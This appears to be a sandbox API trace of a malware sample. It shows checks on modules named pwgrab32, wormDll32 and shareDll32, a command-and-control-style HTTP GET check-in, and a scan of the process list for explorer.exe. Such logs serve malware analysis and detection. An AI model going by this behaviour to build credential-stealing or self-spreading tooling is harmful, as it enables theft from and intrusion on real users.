	[0245.395] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.395] GetFileTime (in: hFile=0x634, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.395] CloseHandle (hObject=0x634) returned 1
	[0245.395] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.395] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0245.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0245.395] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0245.395] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.395] GetFileTime (in: hFile=0x634, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.395] CloseHandle (hObject=0x634) returned 1
	[0245.395] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.395] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0245.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0245.395] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0245.395] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.395] GetFileTime (in: hFile=0x634, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.396] CloseHandle (hObject=0x634) returned 1
	[0245.396] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.396] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0245.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0245.396] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0245.396] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.396] GetFileTime (in: hFile=0x634, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.396] CloseHandle (hObject=0x634) returned 1
	[0245.396] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.396] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0245.396] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0245.396] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/j4Ol7Up5Oi3LdyGcw/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0245.396] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0245.396] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0245.718] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0245.718] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0245.718] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0245.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1570
	[0245.719] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x27e1570, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x27e1570*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0245.719] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0245.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1570, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0245.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0245.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1570, cbMultiByte=3, lpWideCharStr=0x27e1630, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0245.719] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0245.719] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0245.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1798
	[0245.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e17b0
	[0245.719] lstrcpynW (in: lpString1=0x27e17b0, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0245.719] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1870) returned 1
	[0245.719] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0245.719] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1798) returned 1
	[0245.719] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1570) returned 1
	[0245.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6f4
	[0245.723] Process32FirstW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0245.725] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0245.725] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0245.726] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0245.726] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0245.727] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0245.727] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.728] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0245.729] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0245.730] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0245.730] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.731] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0245.731] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0245.732] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0245.733] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0245.734] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0245.734] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0245.735] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0245.735] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0245.736] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0245.736] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.737] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.737] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.738] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.738] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.739] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.739] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.740] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.740] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.741] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.741] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.742] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.742] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.743] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.743] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0245.744] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0245.744] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.745] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.745] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0245.745] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0245.745] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.746] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0245.746] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.747] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.747] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.748] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0245.748] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0245.749] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0245.749] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0245.750] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0245.750] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0245.751] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0245.751] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0245.752] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0245.752] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0245.753] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0245.753] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0245.754] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0245.754] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0245.755] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0245.755] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0245.756] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0245.756] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0245.757] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0245.757] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0245.758] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0245.758] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0245.758] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0245.758] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0245.759] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0245.759] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0245.760] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0245.760] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0245.761] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0245.761] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0245.762] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0245.762] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0245.775] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0245.775] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0245.776] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0245.776] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0245.777] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0245.777] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0245.777] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0245.777] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.778] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0245.778] Process32NextW (in: hSnapshot=0x6f4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.780] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
